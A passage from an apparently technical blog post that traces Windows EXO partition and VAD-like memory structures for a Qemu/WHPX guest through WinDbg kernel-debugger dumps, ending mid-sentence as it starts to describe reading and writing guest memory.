<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564640 fffffc0f`022a73a0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564648 00000000`0000000e – Start GPA</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564650 00000000`0000009f – End GPA</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564658 ffffd883`44414000 – Prtn object</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564660 ffffd883`4802e530 – соответствующий элемент VPN-дерева</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564668 00000000`00000040</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564670 00000000`00000003</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`46564678 00000000`00000000</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dps 0xffffd8834802e530</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`4802e530 ffffd883`4802caa0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`4802e538 ffffd883`4802f250</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`4802e540 ffffd883`4802f7a0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`4802e548 00000000`281af2ee – Start virtual page address</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`4802e550 00000000`281af37f – end virtual page address</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`4802e558 ffffd883`46564628</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`4802e560 ffffd883`46564628</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd883`4802e568 00000000`00000001</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="99" src="https://lh6.googleusercontent.com/rjobTPXcvPBYU4qp4Aj1KCGBHWjegfZ_lbvoUfdT2sMxqRcmyPnyxy8Gynubw6y2EX_RykgI3mS0o3maymkHpaQkOEwarRSg0ERYgfOBzvANH8gfcByqwB5wVIiMPrtV4yYD4GGAc1gChjIjFw" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For Qemu process, you can see, that base address of memory region coincides with beginning of VPN block:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dps 0xffffad04c7872c10</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c10 00000000`00000000</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c18 ffffad04`cc1b7610</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c20 ffffad04`cc269610</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c28 ffffad04`c96a75b8</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c30 ffffad04`c96a75b8</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c38 ffffbf8d`0ef103a0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c40 ffffbf8d`0ef103a0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c48 00000000`00000000 – Start GPA</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c50 00000000`0000009f – End GPA</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c58 ffffad04`c8bd1000 </span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c60 ffffad04`c96a7590 – соответствующий элемент VPN-дерева.</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c68 00000000`00000040</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c70 00000000`00000003</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c7872c78 00000000`00000000</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> dps ffffad04`c96a7590</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a7590 ffffad04`ccb86120</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a7598 ffffad04`c6cd8af0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75a0 ffffad04`c6cd94a0</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75a8 00000000`0007fff0 – Start virtual page address</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75b0 00000000`0008008f – end virtual page address</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75b8 ffffad04`c7872c28</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75c0 ffffad04`c7872c28</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75c8 00000000`00000001</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75d0 53646156`02050000</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75d8 00000000`00000000</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75e0 00000000`00000000</span></div>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffad04`c96a75e8 00000000`00000000</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block;"><img height="77" src="https://lh6.googleusercontent.com/nW-HHF9oBqpJ8mNVYoaX8nTHbthuMbXYLRGKuXKRU-301ECR8HQDJvJw9owxfRmDmquKSjNyUmFc0JtlNQrh6BN6QwLhTrQYR-7LGqIvangs6Zh0_uEe-ppUvOEhxrTKP2qIMa3061fvoPuFCQ" style="margin-left: 0px; margin-top: 0px;" width="490" /></span></span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In some ways, EXO partition memory organization looks like VAD tree, that describes the state of the process address space, built on the basis of AVL trees. There are also minimum and maximum values of the range of the memory block.</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="margin-left: -5.4pt; text-align: left;">
<table style="border-collapse: collapse; border: none; text-align: left;"><colgroup><col width="208"></col><col width="208"></col><col width="208"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dt ntkrnlmp!_MMVAD_SHORT</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 NextVad : Ptr64 _MMVAD_SHORT</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 ExtraCreateInfo : Ptr64 Void</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 VadNode : _RTL_BALANCED_NODE</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x018 StartingVpn : Uint4B</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x01c EndingVpn : Uint4B</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x020 StartingVpnHigh : UChar</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x021 EndingVpnHigh : UChar</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x022 CommitChargeHigh : UChar</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x023 SpareNT64VadUChar : UChar</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x024 ReferenceCount : Int4B</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x028 PushLock : _EX_PUSH_LOCK</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x030 u : <anonymous-tag></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x034 u1 : <anonymous-tag></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x038 EventList : Ptr64 _MI_VAD_EVENT_BLOCK</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dt ntkrnlmp!_MMVAD</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Core : _MMVAD_SHORT</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x040 u2 : <anonymous-tag></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x048 Subsection : Ptr64 _SUBSECTION</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x050 FirstPrototypePte : Ptr64 _MMPTE</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x058 LastContiguousPte : Ptr64 _MMPTE</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x060 ViewLinks : _LIST_ENTRY</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x070 VadsProcess : Ptr64 _EPROCESS</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x078 u4 : <anonymous-tag></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x080 FileObject : Ptr64 _FILE_OBJECT</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; overflow-wrap: break-word; overflow: hidden; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> dt ntkrnlmp!_MI_VAD_SEQUENTIAL_INFO</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Length : Pos 0, 12 Bits</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Vpn : Pos 12, 52 Bits</span></div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Finally, to read\write to the virtual address space of a guest OS, running in Qemu in whpx acceleration mode, you must first:</span></div>
</div>
<div style="text-align: left;">
<b style="font-weight: normal;"><br /></b>
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<div style="text-align: left;">
